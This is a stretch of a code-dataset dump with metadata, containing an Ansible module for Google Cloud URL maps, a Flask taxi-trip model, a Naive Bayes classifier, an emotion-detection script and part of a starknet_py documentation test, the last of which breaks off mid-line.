should be mapped to.\n returned: success\n type: dict\n'''\n\n################################################################################\n# Imports\n################################################################################\n\nfrom ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict\nimport json\nimport time\n\n################################################################################\n# Main\n################################################################################\n\n\ndef main():\n \"\"\"Main function\"\"\"\n\n module = GcpModule(\n argument_spec=dict(\n state=dict(default='present', choices=['present', 'absent'], type='str'),\n default_service=dict(required=True, type='dict'),\n description=dict(type='str'),\n host_rules=dict(type='list', elements='dict', options=dict(\n description=dict(type='str'),\n hosts=dict(type='list', elements='str'),\n path_matcher=dict(type='str')\n )),\n name=dict(type='str'),\n path_matchers=dict(type='list', elements='dict', options=dict(\n default_service=dict(type='dict'),\n description=dict(type='str'),\n name=dict(type='str'),\n path_rules=dict(type='list', elements='dict', options=dict(\n paths=dict(type='list', elements='str'),\n service=dict(type='dict')\n ))\n )),\n tests=dict(type='list', elements='dict', options=dict(\n description=dict(type='str'),\n host=dict(type='str'),\n path=dict(type='str'),\n service=dict(type='dict')\n ))\n )\n )\n\n if not 
module.params['scopes']:\n module.params['scopes'] = ['https://www.googleapis.com/auth/compute']\n\n state = module.params['state']\n kind = 'compute#urlMap'\n\n fetch = fetch_resource(module, self_link(module), kind)\n changed = False\n\n if fetch:\n if state == 'present':\n if is_different(module, fetch):\n fetch = update(module, self_link(module), kind)\n changed = True\n else:\n delete(module, self_link(module), kind)\n fetch = {}\n changed = True\n else:\n if state == 'present':\n fetch = create(module, collection(module), kind)\n changed = True\n else:\n fetch = {}\n\n fetch.update({'changed': changed})\n\n module.exit_json(**fetch)\n\n\ndef create(module, link, kind):\n auth = GcpSession(module, 'compute')\n return wait_for_operation(module, auth.post(link, resource_to_request(module)))\n\n\ndef update(module, link, kind):\n auth = GcpSession(module, 'compute')\n return wait_for_operation(module, auth.put(link, resource_to_request(module)))\n\n\ndef delete(module, link, kind):\n auth = GcpSession(module, 'compute')\n return wait_for_operation(module, auth.delete(link))\n\n\ndef resource_to_request(module):\n request = {\n u'kind': 'compute#urlMap',\n u'defaultService': replace_resource_dict(module.params.get(u'default_service', {}), 'selfLink'),\n u'description': module.params.get('description'),\n u'hostRules': UrlMapHostRulesArray(module.params.get('host_rules', []), module).to_request(),\n u'name': module.params.get('name'),\n u'pathMatchers': UrlMapPathMatchersArray(module.params.get('path_matchers', []), module).to_request(),\n u'tests': UrlMapTestsArray(module.params.get('tests', []), module).to_request()\n }\n return_vals = {}\n for k, v in request.items():\n if v:\n return_vals[k] = v\n\n return return_vals\n\n\ndef fetch_resource(module, link, kind):\n auth = GcpSession(module, 'compute')\n return return_if_object(module, auth.get(link), kind)\n\n\ndef self_link(module):\n return \"https://www.googleapis.com/compute/v1/projects/{project}/global/urlMaps/{name}\".format(**module.params)\n\n\ndef collection(module):\n return \"https://www.googleapis.com/compute/v1/projects/{project}/global/urlMaps\".format(**module.params)\n\n\ndef return_if_object(module, response, kind):\n # If not found, return nothing.\n if response.status_code == 404:\n return None\n\n # If no content, return nothing.\n if response.status_code == 204:\n return None\n\n try:\n module.raise_for_status(response)\n result = response.json()\n except getattr(json.decoder, 'JSONDecodeError', ValueError) as inst:\n module.fail_json(msg=\"Invalid JSON response with error: %s\" % inst)\n\n if navigate_hash(result, ['error', 'errors']):\n module.fail_json(msg=navigate_hash(result, ['error', 'errors']))\n if result['kind'] != kind:\n module.fail_json(msg=\"Incorrect result: {kind}\".format(**result))\n\n return result\n\n\ndef is_different(module, response):\n request = resource_to_request(module)\n response = response_to_hash(module, response)\n\n # Remove all output-only from response.\n response_vals = {}\n for k, v in response.items():\n if k in request:\n response_vals[k] = v\n\n request_vals = {}\n for k, v in request.items():\n if k in response:\n request_vals[k] = v\n\n return GcpRequest(request_vals) != GcpRequest(response_vals)\n\n\n# Remove unnecessary properties from the response.\n# This is for doing comparisons with Ansible's current parameters.\ndef response_to_hash(module, response):\n return {\n u'creationTimestamp': response.get(u'creationTimestamp'),\n u'defaultService': 
response.get(u'defaultService'),\n u'description': response.get(u'description'),\n u'hostRules': UrlMapHostRulesArray(response.get(u'hostRules', []), module).from_response(),\n u'id': response.get(u'id'),\n u'name': response.get(u'name'),\n u'pathMatchers': UrlMapPathMatchersArray(response.get(u'pathMatchers', []), module).from_response(),\n u'tests': UrlMapTestsArray(response.get(u'tests', []), module).from_response()\n }\n\n\ndef async_op_url(module, extra_data=None):\n    if extra_data is None:\n        extra_data = {}\n    url = \"https://www.googleapis.com/compute/v1/projects/{project}/global/operations/{op_id}\"\n    combined = extra_data.copy()\n    combined.update(module.params)\n    return url.format(**combined)\n\n\ndef wait_for_operation(module, response):\n    op_result = return_if_object(module, response, 'compute#operation')\n    if op_result is None:\n        return {}\n    status = navigate_hash(op_result, ['status'])\n    wait_done = wait_for_completion(status, op_result, module)\n    return fetch_resource(module, navigate_hash(wait_done, ['targetLink']), 'compute#urlMap')\n\n\ndef wait_for_completion(status, op_result, module):\n    op_id = navigate_hash(op_result, ['name'])\n    op_uri = async_op_url(module, {'op_id': op_id})\n    while status != 'DONE':\n        # Pass the module itself so raise_if_errors can call module.fail_json;\n        # the original passed the string 'message' here, which would crash.\n        raise_if_errors(op_result, ['error', 'errors'], module)\n        time.sleep(1.0)\n        if status not in ['PENDING', 'RUNNING', 'DONE']:\n            module.fail_json(msg=\"Invalid result %s\" % status)\n        op_result = fetch_resource(module, op_uri, 'compute#operation')\n        status = navigate_hash(op_result, ['status'])\n    return op_result\n\n\ndef raise_if_errors(response, err_path, module):\n    errors = navigate_hash(response, err_path)\n    if errors is not None:\n        module.fail_json(msg=errors)\n\n\nclass UrlMapHostRulesArray(object):\n    def __init__(self, request, module):\n        self.module = module\n        if request:\n            self.request = request\n        else:\n            self.request = []\n\n    def to_request(self):\n        items = []\n        for item in self.request:\n            items.append(self._request_for_item(item))\n        return items\n\n    def from_response(self):\n        items = []\n        for item in self.request:\n            items.append(self._response_from_item(item))\n        return items\n\n    def _request_for_item(self, item):\n        return remove_nones_from_dict({\n            u'description': item.get('description'),\n            u'hosts': item.get('hosts'),\n            u'pathMatcher': item.get('path_matcher')\n        })\n\n    def _response_from_item(self, item):\n        return remove_nones_from_dict({\n            u'description': item.get(u'description'),\n            u'hosts': item.get(u'hosts'),\n            u'pathMatcher': item.get(u'pathMatcher')\n        })\n\n\nclass UrlMapPathMatchersArray(object):\n    def __init__(self, request, module):\n        self.module = module\n        if request:\n            self.request = request\n        else:\n            self.request = []\n\n    def to_request(self):\n        items = []\n        for item in self.request:\n            items.append(self._request_for_item(item))\n        return items\n\n    def from_response(self):\n        items = []\n        for item in self.request:\n            items.append(self._response_from_item(item))\n        return items\n\n    def _request_for_item(self, item):\n        return remove_nones_from_dict({\n            u'defaultService': replace_resource_dict(item.get(u'default_service', {}), 'selfLink'),\n            u'description': item.get('description'),\n            u'name': item.get('name'),\n            u'pathRules': UrlMapPathRulesArray(item.get('path_rules', []), self.module).to_request()\n        })\n\n    def _response_from_item(self, item):\n        return remove_nones_from_dict({\n            u'defaultService': item.get(u'defaultService'),\n            u'description': item.get(u'description'),\n            u'name': item.get(u'name'),\n            u'pathRules': 
UrlMapPathRulesArray(item.get(u'pathRules', []), self.module).from_response()\n })\n\n\nclass UrlMapPathRulesArray(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = []\n\n def to_request(self):\n items = []\n for item in self.request:\n items.append(self._request_for_item(item))\n return items\n\n def from_response(self):\n items = []\n for item in self.request:\n items.append(self._response_from_item(item))\n return items\n\n def _request_for_item(self, item):\n return remove_nones_from_dict({\n u'paths': item.get('paths'),\n u'service': replace_resource_dict(item.get(u'service', {}), 'selfLink')\n })\n\n def _response_from_item(self, item):\n return remove_nones_from_dict({\n u'paths': item.get(u'paths'),\n u'service': item.get(u'service')\n })\n\n\nclass UrlMapTestsArray(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = []\n\n def to_request(self):\n items = []\n for item in self.request:\n items.append(self._request_for_item(item))\n return items\n\n def from_response(self):\n items = []\n for item in self.request:\n items.append(self._response_from_item(item))\n return items\n\n def _request_for_item(self, item):\n return remove_nones_from_dict({\n u'description': item.get('description'),\n u'host': item.get('host'),\n u'path': item.get('path'),\n u'service': replace_resource_dict(item.get(u'service', {}), 'selfLink')\n })\n\n def _response_from_item(self, item):\n return remove_nones_from_dict({\n u'description': item.get(u'description'),\n u'host': item.get(u'host'),\n u'path': item.get(u'path'),\n u'service': item.get(u'service')\n })\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "amitvashist7/ansible-development-CTS", "sub_path": "molecule/my_env/lib/python2.7/site-packages/ansible/modules/cloud/google/gcp_compute_url_map.py", "file_name": "gcp_compute_url_map.py", "file_ext": "py", "file_size_in_byte": 23371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "ansible.module_utils.gcp_utils.GcpModule", "line_number": 318, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.GcpSession", "line_number": 378, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.GcpSession", "line_number": 383, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.GcpSession", "line_number": 388, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.replace_resource_dict", "line_number": 395, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.GcpSession", "line_number": 411, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 435, "usage_type": "attribute"}, {"api_name": "ansible.module_utils.gcp_utils.navigate_hash", "line_number": 438, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.navigate_hash", "line_number": 439, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.GcpRequest", "line_number": 461, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.navigate_hash", "line_number": 492, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.navigate_hash", "line_number": 494, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.navigate_hash", "line_number": 498, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 502, "usage_type": "call"}, {"api_name": 
"ansible.module_utils.gcp_utils.navigate_hash", "line_number": 506, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.navigate_hash", "line_number": 511, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 537, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 544, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 572, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.replace_resource_dict", "line_number": 573, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 580, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 609, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.replace_resource_dict", "line_number": 611, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 615, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 642, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.replace_resource_dict", "line_number": 646, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 650, "usage_type": "call"}]} +{"seq_id": "73649840513", "text": "from database import Base\nfrom sqlalchemy import Column, Integer, String, Boolean, ForeignKey, DateTime, Float\nfrom sqlalchemy.types import DateTime\n\n\n\nfrom flask import Flask, request, jsonify, make_response\n\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\nclass Medallions(Base):\n\t__tablename__ = 'medallions'\n\t\n\tid = Column(Integer, primary_key=True)\n\tmedallion = Column(String(50))\n\thack_license = Column(String(20))\n\tvendor_id = Column(String(20))\n\trate_code = Column(String(20))\n\tstore_and_fwd_flag = Column(String(20)) \n\tpickup_datetime = Column(DateTime)\n\tdropoff_datetime = Column(DateTime)\n\tpassenger_count = Column(Integer)\n\ttrip_time_in_secs = Column(Integer)\n\ttrip_distance = Column(Float)\n\n", "repo_name": "12DReflections/cab_trips", "sub_path": "models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 795, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 14, "usage_type": "call"}, {"api_name": "database.Base", "line_number": 16, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 19, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": 
"call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.types.DateTime", "line_number": 25, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.types.DateTime", "line_number": 26, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 27, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 28, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Float", "line_number": 29, "usage_type": "argument"}]} +{"seq_id": "70423693956", "text": "\"\"\"\nNaiveBayes is a generative classifier based on the Naive assumption that features are independent from each other\nP(w1, w2, ..., wn|y) = P(w1|y) P(w2|y) ... P(wn|y)\nThus argmax_{y} (P(y|w1,w2, ... wn)) can be modeled as argmax_{y} P(w1|y) P(w2|y) ... P(wn|y) P(y) using Bayes Rule\nand P(w1, w2, ... ,wn) is constant with respect to argmax_{y} \nPlease refer to lecture notes Chapter 4 for more details\n\"\"\"\n\nfrom collections import Counter, defaultdict\nfrom math import log\nimport operator\n\nimport numpy as np\nfrom Features import Features, tokenize\nfrom Model import *\n\n\nclass NBFeatures(Features):\n @classmethod \n def get_features(cls, tokenized, model):\n features = []\n token_to_embed = model['token_to_embed']\n for token in tokenized:\n embed = token_to_embed.get(token)\n if embed is not None:\n features.append(embed)\n else:\n features.append(token_to_embed['__OOV__'])\n return features\n\nclass NaiveBayes(Model):\n \n def __init__(self, model_file, vocab_size=None):\n super().__init__(model_file)\n self.vocab_size = vocab_size\n \n \n def train(self, input_file):\n \"\"\"\n This method is used to train your models and generated for a given input_file a trained model\n :param input_file: path to training file with a text and a label per each line\n :return: model: trained model \n \"\"\"\n \n wprobdenom = '__ALL__'\n \n nbFeatures = NBFeatures(input_file, vocab_size=self.vocab_size)\n \n model = {\n 'type': NaiveBayes.__class__,\n 'categories_probs': {},\n 'words_probs': {},\n 'options': nbFeatures.labelset,\n 'token_to_embed': nbFeatures.token_to_embed,\n 'embed_to_token': nbFeatures.embed_to_token,\n 'vocab_size': self.vocab_size,\n\n # 'label_to_embed': nbFeatures.label_to_embed,\n # 'embed_to_label': nbFeatures.embed_to_label,\n }\n \n wscores = defaultdict(lambda: Counter())\n cscores = Counter()\n \n features_list = list(map(lambda x: NBFeatures.get_features(x, model), nbFeatures.tokenized_text))\n # Y_true = list(map(lambda x: model['label_to_embed'][x], nbFeatures.labels))\n \n cutoff = int(len(features_list)*0.9)\n X_train, X_valid = features_list[:cutoff], features_list[cutoff:]\n Y_train, Y_valid = nbFeatures.labels[:cutoff], nbFeatures.labels[cutoff:]\n \n for features, label in zip(X_train, Y_train):\n cscores[label] += 1\n for f in features:\n wscores[label][f] += 1\n wscores[label][wprobdenom] += 1\n \n # Laplace Smoothing (+1)\n for label in model['options']:\n wprob = {}\n for token in nbFeatures.token_to_embed:\n embed = model['token_to_embed'][token]\n wprob[embed] = 1 / 
(wscores[label][wprobdenom] + 1)\n model['words_probs'][label] = wprob\n \n for label in model['options']:\n # Class prior = fraction of training documents with this label;\n # the original divided by len(features), the token count of the last document.\n model['categories_probs'][label] =\\\n cscores[label] / len(X_train)\n for feature, score in wscores[label].items():\n # Laplace Smoothing (+1)\n # Overriding vocab values if applicable\n model['words_probs'][label][feature] = (score + 1) / (wscores[label][wprobdenom] + 1)\n \n \n # Validate\n train_err =\\\n np.sum(np.array(self._classify(X_train, model)) != np.array(Y_train))/len(Y_train)\n\n valid_err =\\\n np.sum(np.array(self._classify(X_valid, model)) != np.array(Y_valid))/len(Y_valid)\n \n print(f'TrainErr = {train_err}, ValidErr = {valid_err}', end='\\\\n')\n \n ## Save the model\n self.save_model(model)\n print('Saved model.')\n return model\n\n\n    def _classify(self, features_list, model):\n        def evaluate(features, option, model):\n            score = log(model['categories_probs'][option])\n            for f in features:\n                score += log(model['words_probs'][option][f])\n            return score \n        \n        preds = []\n        for features in features_list:\n            scores = {}\n            for option in model['options']:\n                scores[option] = evaluate(features, option, model)\n            preds.append(\n                max(scores.items(), key=operator.itemgetter(1))[0]\n            )\n        return preds\n    \n    def classify(self, input_file, model):\n        \"\"\"\n        This method will be called by us for the validation stage and/or you can call it for evaluating your code \n        on your own splits on top of the training sets available to you\n        :param input_file: path to input file with a text per line without labels\n        :param model: the pretrained model\n        :return: predictions list\n        \"\"\" \n        with open(input_file) as file:\n            tokenized_sentences =\\\n                map(tokenize, file.read().splitlines())\n\n        features_list = list(map(lambda x: NBFeatures.get_features(x, model), tokenized_sentences))\n        preds = self._classify(features_list, model) \n        return preds\n\n\n", "repo_name": "BasRizk/NaiveBayesVsPerceptronNLP", "sub_path": "naivebayes.py", "file_name": "naivebayes.py", "file_ext": "py", "file_size_in_byte": 5304, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Features.Features", "line_number": 18, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 62, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 62, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "math.log", "line_number": 112, "usage_type": "call"}, {"api_name": "math.log", "line_number": 114, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 123, "usage_type": "call"}, {"api_name": "Features.tokenize", "line_number": 137, "usage_type": "argument"}]}
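Aside: the Naive Bayes record above scores a label as log P(y) plus the sum of log P(w|y) over a document's tokens and takes the argmax, exactly as its opening docstring derives. A tiny worked instance of that scoring follows; the two-label model and all probabilities are invented purely for illustration.

from math import log

# Hypothetical two-label model: class priors and per-token likelihoods.
priors = {'pos': 0.5, 'neg': 0.5}
likelihoods = {
    'pos': {'good': 0.20, 'bad': 0.05},
    'neg': {'good': 0.05, 'bad': 0.20},
}

def score(tokens, label):
    # argmax_y P(y) * prod_w P(w|y), computed in log space for numerical stability
    return log(priors[label]) + sum(log(likelihoods[label][t]) for t in tokens)

doc = ['good', 'good', 'bad']
best = max(priors, key=lambda y: score(doc, y))
print(best)  # 'pos': two 'good' tokens outweigh one 'bad'

+{"seq_id": "5134181261", "text": "# SPDX-License-Identifier: MIT\n# © 2020-2022 ETH Zurich and other contributors, see AUTHORS.txt for details\n\nfrom gdl_apps.EmotionRecognition.utils.io import load_model\nfrom gdl.datasets.ImageTestDataset import TestData\nimport gdl\nimport numpy as np\nimport os\nimport torch\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nfrom torch.functional import F\nfrom gdl.datasets.AffectNetDataModule import AffectNetExpressions\nfrom gdl.utils.other import 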
get_path_to_assets\nfrom tqdm import tqdm\n\ndef load_dir(lmspath, framepath, start, end):\n lmss = []\n imgs_paths = []\n for i in range(start, end):\n if os.path.isfile(os.path.join(lmspath, str(i) + '.lms')):\n lms = np.loadtxt(os.path.join(\n lmspath, str(i) + '.lms'), dtype=np.float32)\n lmss.append(lms)\n imgs_paths.append(os.path.join(framepath, str(i) + '.jpg'))\n lmss = np.stack(lmss)\n lmss = torch.as_tensor(lmss).cuda()\n return imgs_paths\n\nclass EMOCA_tracker:\n def __init__(self):\n \n model_name = 'ResNet50'\n path_to_models = get_path_to_assets() /\"EmotionRecognition\"\n\n path_to_models = path_to_models / \"image_based_networks\"\n\n self.model = load_model(Path(path_to_models) / model_name)\n print(self.model)\n self.model.cuda()\n self.model.eval()\n\n def __call__(self, images, tform=None):\n\n codedict = self.model(images)\n\n return codedict\n \n def save_images(self, batch, predictions, output_folder):\n # Save the images\n\n softmax = F.softmax(predictions[\"expr_classification\"])\n top_expr = torch.argmax(softmax, dim=1)\n for i in range(len(batch[\"image\"])):\n img = batch[\"image\"][i].cpu().detach().numpy()\n img = img.transpose(1, 2, 0)\n img = img * 255\n img = img.astype(np.uint8)\n\n plt.figure()\n # plot the image with matplotlib \n plt.imshow(img)\n # write valence and arousal to the image\n expr = AffectNetExpressions(int(top_expr[i].item()))\n text = \"Predicted emotion:\\n\"\n text += f'Arousal: {predictions[\"arousal\"][i].item():.2f} \\nValence: {predictions[\"valence\"][i].item():.2f}'\n text += f\"\\nExpression: {expr.name}, {softmax[i][expr.value].item()*100:.2f}%\"\n plt.title(text)\n out_fname = Path(output_folder) / f\"{batch['image_name'][i]}.png\"\n # save the image to the output folder\n \n # axis off \n plt.axis('off')\n plt.savefig(out_fname)\n plt.close()\n\n\ndef emotion_detection(dataset_base, emotion_dir):\n '''\n Face tracker using FLAME model.\n Used to have geometry prior for nerf sampling.\n '''\n\n id_dir = dataset_base\n debug_emotions = os.path.join(id_dir, 'debug', 'emotions_imgs')\n Path(debug_emotions).mkdir(parents=True, exist_ok=True)\n\n emoca_tracker = EMOCA_tracker()\n\n # Run deca on all frames\n testdata = TestData(os.path.join(id_dir, 'frames'), face_detector=\"fan\", max_detection=20)\n \n for i, data in enumerate(tqdm(testdata)):\n batch = testdata[i]\n batch[\"image\"] = batch[\"image\"].cuda()\n predictions = emoca_tracker(batch)\n npy_pred = {k: v.cpu().detach().numpy() for k,v in predictions.items()}\n np.save(os.path.join(emotion_dir, '%5d.npy' % i), npy_pred)\n\n emoca_tracker.save_images(batch, predictions, debug_emotions)\n\nif __name__ == '__main__':\n\n dataset_base = '/media/apennino/EmotionDetection/Test/Greta/'\n emotion_dir = '/media/apennino/EmotionDetection/Test/Greta/emotions/'\n emotion_detection(dataset_base, emotion_dir)\n", "repo_name": "mediatechnologycenter/AvatarForge", "sub_path": "motion-gan-pipeline/preprocessing/emoca_tracker.py", "file_name": "emoca_tracker.py", "file_ext": "py", "file_size_in_byte": 3711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.isfile", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.as_tensor", "line_number": 27, "usage_type": "call"}, {"api_name": "gdl.utils.other.get_path_to_assets", "line_number": 34, "usage_type": "call"}, {"api_name": "gdl_apps.EmotionRecognition.utils.io.load_model", "line_number": 38, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.functional.F.softmax", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.functional.F", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.argmax", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 58, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "gdl.datasets.AffectNetDataModule.AffectNetExpressions", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 86, "usage_type": "call"}, {"api_name": "gdl.datasets.ImageTestDataset.TestData", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}]} +{"seq_id": "39616804491", "text": "# pylint: disable=unused-variable\nimport pytest\nfrom starkware.starknet.public.abi import (\n get_selector_from_name,\n get_storage_var_address,\n)\n\nfrom starknet_py.net.client_models import Call\nfrom starknet_py.net.full_node_client import FullNodeClient\nfrom starknet_py.net.networks import TESTNET\n\n\ndef test_init():\n # docs-start: init\n full_node_client = FullNodeClient(node_url=\"https://your.node.url\", net=TESTNET)\n # docs-end: init\n\n\n@pytest.mark.asyncio\nasync def test_get_block(full_node_client):\n # docs-start: get_block\n block = await full_node_client.get_block(block_number=\"latest\")\n block = await 
full_node_client.get_block(block_number=0)\n # or\n block = await full_node_client.get_block(block_hash=\"0x0\")\n # docs-end: get_block\n\n\n@pytest.mark.asyncio\nasync def test_get_state_update(full_node_client):\n # docs-start: get_state_update\n state_update = await full_node_client.get_state_update(block_number=\"latest\")\n state_update = await full_node_client.get_state_update(block_number=0)\n # or\n state_update = await full_node_client.get_state_update(block_hash=\"0x0\")\n # docs-end: get_state_update\n\n\n@pytest.mark.asyncio\nasync def test_get_storage_at(full_node_client, map_contract):\n address = map_contract.address\n # docs-start: get_storage_at\n storage_value = await full_node_client.get_storage_at(\n contract_address=address,\n key=get_storage_var_address(\"storage_var name\"),\n block_number=\"latest\",\n )\n # docs-end: get_storage_at\n\n\n@pytest.mark.asyncio\nasync def test_get_transaction(full_node_client, declare_transaction_hash):\n # docs-start: get_transaction\n transaction_hash = 0x1 or 1 or \"0x1\"\n # docs-end: get_transaction\n transaction_hash = declare_transaction_hash\n # docs-start: get_transaction\n transaction = await full_node_client.get_transaction(tx_hash=transaction_hash)\n # docs-end: get_transaction\n\n\n@pytest.mark.asyncio\nasync def test_get_transaction_receipt(full_node_client, declare_transaction_hash):\n transaction_hash = declare_transaction_hash\n # docs-start: get_transaction_receipt\n transaction_receipt = await full_node_client.get_transaction_receipt(\n tx_hash=transaction_hash\n )\n # docs-end: get_transaction_receipt\n\n\n@pytest.mark.asyncio\nasync def test_estimate_fee(full_node_account, deploy_account_transaction):\n full_node_client = full_node_account.client\n transaction = deploy_account_transaction\n # docs-start: estimate_fee\n estimated_fee = await full_node_client.estimate_fee(tx=transaction)\n # docs-end: estimate_fee\n\n\n@pytest.mark.asyncio\nasync def test_call_contract(full_node_client, contract_address):\n # docs-start: call_contract\n response = await full_node_client.call_contract(\n call=Call(\n to_addr=contract_address,\n selector=get_selector_from_name(\"increase_balance\"),\n calldata=[123],\n ),\n block_number=\"latest\",\n )\n # docs-end: call_contract\n\n\n@pytest.mark.asyncio\nasync def test_get_class_hash_at(full_node_client, contract_address):\n # docs-start: get_class_hash_at\n address = 0x1 or 1 or \"0x1\"\n # docs-end: get_class_hash_at\n address = contract_address\n # docs-start: get_class_hash_at\n class_hash = await 